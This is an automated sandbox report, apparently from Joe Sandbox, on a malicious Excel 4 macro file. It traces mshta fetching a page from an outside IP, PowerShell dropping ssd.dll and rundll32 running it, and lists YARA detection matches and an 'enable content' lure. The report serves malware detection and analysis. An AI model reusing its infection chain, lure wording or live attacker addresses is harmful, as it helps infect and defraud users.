                            Source: global traffic HTTP traffic detected: GET /zzx/ccv/fe.html HTTP/1.1 Accept: */* Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 91.240.118.168 Connection: Keep-Alive
                            Source: Joe Sandbox View ASN Name: HETZNER-ASDE
                            Source: Joe Sandbox View ASN Name: OnlineSASFR
                            Source: Joe Sandbox View IP Address: 94.130.116.76
                            Source: Joe Sandbox View IP Address: 195.154.133.20
                            Source: unknown Network traffic detected: IP country count 21
                            Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm
                            Source: unknown DNS traffic detected: queries for: www.yeald.finance
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10012C30 _memset,connect,_strcat,send,recv,9_2_10012C30
                            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
                            Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443
                            Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: mshta.exe, 00000004.00000002.433720521.0000000003130000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: mshta.exe, 00000004.00000002.433720521.0000000003130000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: powershell.exe, 00000006.00000002.672134847.000000000029F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.672280247.000000000041C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,9_2_1001B43F
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,11_2_1001B43F
                            Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS

                            E-Banking Fraud

                            Source: Yara match File source: C:\Users\Public\Documents\ssd.dll, type: DROPPED

                            System Summary

                            Source: imedpub.com_10.xls Macro extractor: Sheet: Macro1 contains: mshta
                            Source: imedpub.com_10.xls, type: SAMPLE Matched rule: Detects OLE Excel 4 Macros documents acting as downloaders Author: ditekSHen
                            Source: C:\Users\user\Desktop\imedpub.com_10.xls, type: DROPPED Matched rule: Detects OLE Excel 4 Macros documents acting as downloaders Author: ditekSHen
                            Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 17 18 19 20 21 22 23
                            Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. 11 12 13 14 Previewing is not available for protected documents. 15 16
                            Source: Screenshot number: 4 Screenshot OCR: protected documents. 15 16 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
                            Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 17 18 19 20 21 22 23 24 25 26 27 28 2
                            Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 0 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: Screenshot number: 8 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 17 18 19 20 21 22 23 G
                            Source: Screenshot number: 8 Screenshot OCR: DOCUMENT IS PROTECTED. 11 12 13 14 , . Previewing is not available for protected documents. 15
                            Source: Screenshot number: 8 Screenshot OCR: protected documents. 15 16 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
                            Source: Screenshot number: 8 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 17 18 19 20 21 22 23 G) I I 24 25 26 27
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Documents\ssd.dll
                            Source: imedpub.com_10.xls Initial sample: EXEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00334C5D11_2_00334C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00346C4911_2_00346C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0034DCF711_2_0034DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00345CC411_2_00345CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00336D2411_2_00336D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00346DF811_2_00346DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00347DD511_2_00347DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00339DCF11_2_00339DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00333E3F11_2_00333E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00350E3A11_2_00350E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0034BE2711_2_0034BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00335E6011_2_00335E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0034AE6D11_2_0034AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00340E5311_2_00340E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0033EE8111_2_0033EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0033AEFB11_2_0033AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00334EE311_2_00334EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00349EEC11_2_00349EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0034DEDC11_2_0034DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00350F3311_2_00350F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0033CF4711_2_0033CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0033DFF311_2_0033DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00337FF211_2_00337FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D303C12_2_003D303C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D323F12_2_003D323F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003EA03A12_2_003EA03A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003F023A12_2_003F023A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D703712_2_003D7037
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003EE83512_2_003EE835
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E9E3012_2_003E9E30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003EBA3112_2_003EBA31
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003EB22712_2_003EB227
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003F001412_2_003F0014
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D3C1612_2_003D3C16
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D841112_2_003D8411
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E7A0612_2_003E7A06
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DF40112_2_003DF401
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E847F12_2_003E847F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003EA26D12_2_003EA26D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E9A6612_2_003E9A66
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D526012_2_003D5260
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D405D12_2_003D405D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003EF45612_2_003EF456
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D0E5612_2_003D0E56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D145112_2_003D1451
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D165112_2_003D1651
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E025312_2_003E0253
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DF84F12_2_003DF84F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E604912_2_003E6049
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E14BA12_2_003E14BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D64B312_2_003D64B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DDE9912_2_003DDE99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DE49B12_2_003DE49B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E0C8912_2_003E0C89
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DE28112_2_003DE281
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DECFD12_2_003DECFD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DA2FB12_2_003DA2FB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003ED0F712_2_003ED0F7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E92EC12_2_003E92EC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E96E812_2_003E96E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D42E312_2_003D42E3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D58E212_2_003D58E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003ED2DC12_2_003ED2DC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DCAD812_2_003DCAD8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DD6CC12_2_003DD6CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E5ACA12_2_003E5ACA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DA6C712_2_003DA6C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E50C412_2_003E50C4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D7F3D12_2_003D7F3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D6B3512_2_003D6B35
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003F033312_2_003F0333
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D612412_2_003D6124
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003EAF2312_2_003EAF23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DFF1912_2_003DFF19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E791912_2_003E7919
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E351612_2_003E3516
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D8B1412_2_003D8B14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DAF7E12_2_003DAF7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D7D6912_2_003D7D69
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E0B6B12_2_003E0B6B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D476112_2_003D4761
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D995F12_2_003D995F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003EBF5B12_2_003EBF5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E195012_2_003E1950
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DAB4D12_2_003DAB4D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D494812_2_003D4948
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E7D4B12_2_003E7D4B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DC34712_2_003DC347
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D374612_2_003D3746
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D45BB12_2_003D45BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D75B712_2_003D75B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003EFDB512_2_003EFDB5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003F07AD12_2_003F07AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E6FA612_2_003E6FA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003EB7A012_2_003EB7A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003ED79512_2_003ED795
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DE99112_2_003DE991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DDD9112_2_003DDD91
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003EC78912_2_003EC789
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E3F8712_2_003E3F87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D9F8712_2_003D9F87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E3F8412_2_003E3F84
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D8F8312_2_003D8F83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E89FA12_2_003E89FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E61F812_2_003E61F8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DD3F312_2_003DD3F3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D73F212_2_003D73F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D4DF212_2_003D4DF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003ECFEA12_2_003ECFEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E7FE312_2_003E7FE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D1FD912_2_003D1FD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E71D512_2_003E71D5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E8FCF12_2_003E8FCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003D91CF12_2_003D91CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003DD9CF12_2_003DD9CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00353C3C12_2_00353C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035901112_2_00359011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036044F12_2_0036044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003620BA12_2_003620BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035F8FD12_2_0035F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035D6D812_2_0035D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036473C12_2_0036473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036411612_2_00364116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003713AD12_2_003713AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035AB8712_2_0035AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00357FF212_2_00357FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003559F212_2_003559F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003695FA12_2_003695FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00357C3712_2_00357C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036F43512_2_0036F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036AA3012_2_0036AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036C63112_2_0036C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00353E3F12_2_00353E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036AC3A12_2_0036AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00370E3A12_2_00370E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036BE2712_2_0036BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035481612_2_00354816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00370C1412_2_00370C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036860612_2_00368606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036000112_2_00360001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036907F12_2_0036907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036A66612_2_0036A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00355E6012_2_00355E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036AE6D12_2_0036AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0037005612_2_00370056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00351A5612_2_00351A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035205112_2_00352051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035225112_2_00352251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00360E5312_2_00360E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00354C5D12_2_00354C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00366C4912_2_00366C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003570B312_2_003570B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035EA9912_2_0035EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035F09B12_2_0035F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035EE8112_2_0035EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036188912_2_00361889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036DCF712_2_0036DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035AEFB12_2_0035AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00354EE312_2_00354EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003564E212_2_003564E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00369EEC12_2_00369EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036A2E812_2_0036A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036DEDC12_2_0036DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035B2C712_2_0035B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00365CC412_2_00365CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035E2CC12_2_0035E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003666CA12_2_003666CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035773512_2_00357735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00370F3312_2_00370F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00358B3D12_2_00358B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00356D2412_2_00356D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036BB2312_2_0036BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035971412_2_00359714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036851912_2_00368519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00360B1912_2_00360B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035BB7E12_2_0035BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035536112_2_00355361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035896912_2_00358969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036176B12_2_0036176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036255012_2_00362550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035A55F12_2_0035A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036CB5B12_2_0036CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035CF4712_2_0035CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035434612_2_00354346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035B74D12_2_0035B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035554812_2_00355548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036894B12_2_0036894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003709B512_2_003709B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003581B712_2_003581B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003551BB12_2_003551BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00367BA612_2_00367BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036C3A012_2_0036C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036E39512_2_0036E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035E99112_2_0035E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00364B8712_2_00364B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00359B8312_2_00359B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036D38912_2_0036D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035DFF312_2_0035DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00366DF812_2_00366DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00368BE312_2_00368BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036DBEA12_2_0036DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00367DD512_2_00367DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00352BD912_2_00352BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00369BCF12_2_00369BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00359DCF12_2_00359DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035E5CF12_2_0035E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002AF8FD13_2_002AF8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002AAB8713_2_002AAB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002AE99113_2_002AE991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002BBE2713_2_002BBE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002BAC3A13_2_002BAC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A3E3F13_2_002A3E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A3C3C13_2_002A3C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002C0E3A13_2_002C0E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002BC63113_2_002BC631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002BAA3013_2_002BAA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A7C3713_2_002A7C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002BF43513_2_002BF435
                            Source: 41B1.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                            Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
                            Source: imedpub.com_10.xls Macro extractor: Sheet name: Macro1
                            Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                            Source: Joe Sandbox View Dropped File: C:\Users\Public\Documents\ssd.dll 7A4A00A0FD4DBF14780E1536313A65728FE875D3B05973043FE6A0F61DAADF4A
                            Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0035E249 DeleteService, 12_2_0035E249
                            Source: imedpub.com_10.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: imedpub.com_10.xls, type: SAMPLE Matched rule: INDICATOR_OLE_Excel4Macros_DL2 author = ditekSHen, description = Detects OLE Excel 4 Macros documents acting as downloaders
                            Source: C:\Users\user\Desktop\imedpub.com_10.xls, type: DROPPED Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Users\user\Desktop\imedpub.com_10.xls, type: DROPPED Matched rule: INDICATOR_OLE_Excel4Macros_DL2 author = ditekSHen, description = Detects OLE Excel 4 Macros documents acting as downloaders
                            Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Qnjiyxnfa\
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10032B38 appears 108 times
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100201F1 appears 34 times
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100200FD appears 72 times
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D27 appears 288 times
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 1001F9FC appears 52 times
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D5A appears 82 times
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100359C1 appears 46 times
                            Source: imedpub.com_10.xls OLE indicator, VBA macros: true
                            Source: imedpub.com_10.xls.0.dr OLE indicator, VBA macros: true
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Documents\ssd.dll
                            Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@21/13@1/47
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
                            Source: imedpub.com_10.xls OLE indicator, Workbook stream: true
                            Source: imedpub.com_10.xls.0.dr OLE indicator, Workbook stream: true
